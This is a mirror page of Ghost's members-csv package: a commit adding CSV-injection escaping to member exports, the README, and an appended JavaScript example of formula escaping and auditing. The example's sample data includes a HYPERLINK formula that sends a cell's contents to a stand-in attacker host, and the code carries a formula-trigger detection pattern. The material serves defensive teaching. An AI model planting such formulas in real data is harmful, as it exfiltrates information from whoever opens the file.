mirror of https://github.com/TryGhost/Ghost.git synced 2025-01-06 22:40:14 -05:00
ghost/ghost/members-csv
Daniel Lockyer de668e7950 🔒 Added escaping to member export CSV fields
fix https://linear.app/tryghost/issue/ENG-805/
refs https://owasp.org/www-community/attacks/CSV_Injection

- it's possible for certain fields in a member CSV export to be executed
  by software that opens the CSVs
- we can protect against this for the user by escaping any formulae in
  the CSV fields
- papaparse provides this option natively, so it's just a case of
  providing the field to the unparse method
- credits to Harvey Spec (phulelouch) for reporting
2024-04-03 10:21:02 +02:00
lib 🔒 Added escaping to member export CSV fields 2024-04-03 10:21:02 +02:00
test 🔒 Added escaping to member export CSV fields 2024-04-03 10:21:02 +02:00
.eslintrc.js
index.js
package.json Update dependency fs-extra to v11.2.0 2023-11-28 11:54:44 +01:00
README.md Fixed typos (#18648) 2023-10-31 15:21:44 +00:00

Members Csv

Usage

There are 2 parts to this package: parsing CSV into JSON and serializing JSON to CSV. The module exposes 2 methods to fulfil these: parse and unparse respectively.

To parse a CSV file and convert it to JSON, use the parse method, e.g.:

const {parse} = require('@tryghost/members-csv');

const mapping = {
    email: 'csv_column_containing_email_data',
    name: 'csv_column_containing_names_data'
};
const membersJSON = await parse(csvFilePath, mapping);

csvFilePath - path to the CSV file that has to be processed
mapping - optional parameter; a hash describing a custom mapping of CSV columns to JSON properties

An example mapping for a CSV that has the email under a correo_electronico column would look like the following:

{
    email: 'correo_electronico'
}

To unparse JSON to CSV compatible with the members format, use the following:

const {unparse} = require('@tryghost/members-csv');

const members = [{
    email: 'email@example.com',
    name: 'Sam Memberino',
    note: 'Early supporter'
}];

const membersCSV = unparse(members);

console.log(membersCSV);
// -> "id,email,name,note,subscribed_to_emails,complimentary_plan,stripe_customer_id,created_at,deleted_at,labels\r\n,email@example.com,Sam Memberino,Early supporter,,,,,,"
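The following is an added example, not code from @tryghost/members-csv or from papaparse. It reimplements in miniature the two operations this README describes (parse with a column mapping, unparse to the members format) and adds the formula escaping that the commit above turns on through papaparse's unparse option: any cell whose value starts with a character a spreadsheet treats as the start of a formula is prefixed with an apostrophe. The column list, the trigger character set (taken from the OWASP CSV Injection page linked in the commit: =, +, -, @, tab, carriage return), the helper names and the member records are all assumptions made for the example.

```javascript
// Added example, not code from @tryghost/members-csv or papaparse.
// Column order, trigger characters and sample data are assumptions.

// Columns in the order the README's sample unparse output shows them.
const COLUMNS = ['id', 'email', 'name', 'note', 'subscribed_to_emails',
    'complimentary_plan', 'stripe_customer_id', 'created_at', 'deleted_at', 'labels'];

// Leading characters that make Excel/LibreOffice/Sheets evaluate a cell as a
// formula (set follows the OWASP CSV Injection page).
const FORMULA_TRIGGERS = /^[=+\-@\t\r]/;

// Serialise one value for a CSV cell: neutralise formulae, then quote per RFC 4180.
function escapeField(value, {escapeFormulae = true} = {}) {
    if (value === null || value === undefined) {
        return '';
    }
    let str = String(value);
    if (escapeFormulae && FORMULA_TRIGGERS.test(str)) {
        str = `'${str}`; // a leading apostrophe tells the spreadsheet "this cell is text"
    }
    if (/[",\r\n]/.test(str)) {
        str = `"${str.replace(/"/g, '""')}"`;
    }
    return str;
}

// JSON -> CSV in the members format: header plus one CRLF-separated row per member.
function unparseMembers(members, opts) {
    const rows = members.map(m => COLUMNS.map(col => escapeField(m[col], opts)).join(','));
    return [COLUMNS.join(','), ...rows].join('\r\n');
}

// Split one CSV line into fields, honouring quotes and doubled-quote escapes.
// Quoted fields that span several lines are not handled in this sketch.
function parseCsvLine(line) {
    const fields = [];
    let cur = '';
    let inQuotes = false;
    for (let i = 0; i < line.length; i++) {
        const ch = line[i];
        if (inQuotes) {
            if (ch === '"' && line[i + 1] === '"') { cur += '"'; i++; }
            else if (ch === '"') { inQuotes = false; }
            else { cur += ch; }
        } else if (ch === '"') {
            inQuotes = true;
        } else if (ch === ',') {
            fields.push(cur); cur = '';
        } else {
            cur += ch;
        }
    }
    fields.push(cur);
    return fields;
}

// CSV -> JSON with an optional column mapping such as {email: 'correo_electronico'},
// mirroring the README's parse(csvFilePath, mapping) but operating on a string.
function parseMembers(csvText, mapping = {}) {
    const [headerLine, ...lines] = csvText.split(/\r?\n/).filter(l => l.length > 0);
    const header = parseCsvLine(headerLine);
    const sourceFor = Object.fromEntries(COLUMNS.map(c => [c, mapping[c] || c]));
    return lines.map((line) => {
        const cells = parseCsvLine(line);
        const row = Object.fromEntries(header.map((h, i) => [h, i < cells.length ? cells[i] : '']));
        const member = {};
        for (const col of COLUMNS) {
            if (sourceFor[col] in row) { member[col] = row[sourceFor[col]]; }
        }
        return member;
    });
}

// Audit helper: list the cells of an existing export that a spreadsheet would evaluate.
function findFormulaCells(csvText) {
    const [headerLine, ...lines] = csvText.split(/\r?\n/).filter(l => l.length > 0);
    const header = parseCsvLine(headerLine);
    const hits = [];
    lines.forEach((line, r) => {
        parseCsvLine(line).forEach((cell, c) => {
            if (FORMULA_TRIGGERS.test(cell)) { hits.push({row: r + 1, column: header[c], cell}); }
        });
    });
    return hits;
}

// Constructed sample data: the second member's name is the kind of value the commit
// message refers to; exported unescaped, a spreadsheet would evaluate it on open.
const SAMPLE_MEMBERS = [
    {email: 'email@example.com', name: 'Sam Memberino', note: 'Early supporter'},
    {email: 'attacker@example.com', name: '=HYPERLINK("http://evil.example/"&A1,"click")', note: 'Refer "a friend", save 10%'}
];

// Constructed import file using the README's correo_electronico mapping example.
const SAMPLE_IMPORT_CSV = 'correo_electronico,name\r\nsam@example.com,Sam Memberino\r\n';

function demo() {
    return {
        unsafe: unparseMembers(SAMPLE_MEMBERS, {escapeFormulae: false}),
        safe: unparseMembers(SAMPLE_MEMBERS),
        imported: parseMembers(SAMPLE_IMPORT_CSV, {email: 'correo_electronico'})
    };
}

const out = demo();
console.log(findFormulaCells(out.unsafe)); // one hit: row 2, column "name"
console.log(findFormulaCells(out.safe));   // []
console.log(out.imported);                 // [{email: 'sam@example.com', name: 'Sam Memberino'}]
```

Two caveats a practitioner should keep in mind. The trigger set deliberately includes "-", so legitimate values such as negative numbers or names beginning with a hyphen also get the apostrophe; that is the accepted trade-off of this defence. And the apostrophe is inserted at export time only: a consumer that re-imports the file (including a parse with the mapping shown above) receives the apostrophe as part of the value and must strip it itself if it wants the original text back.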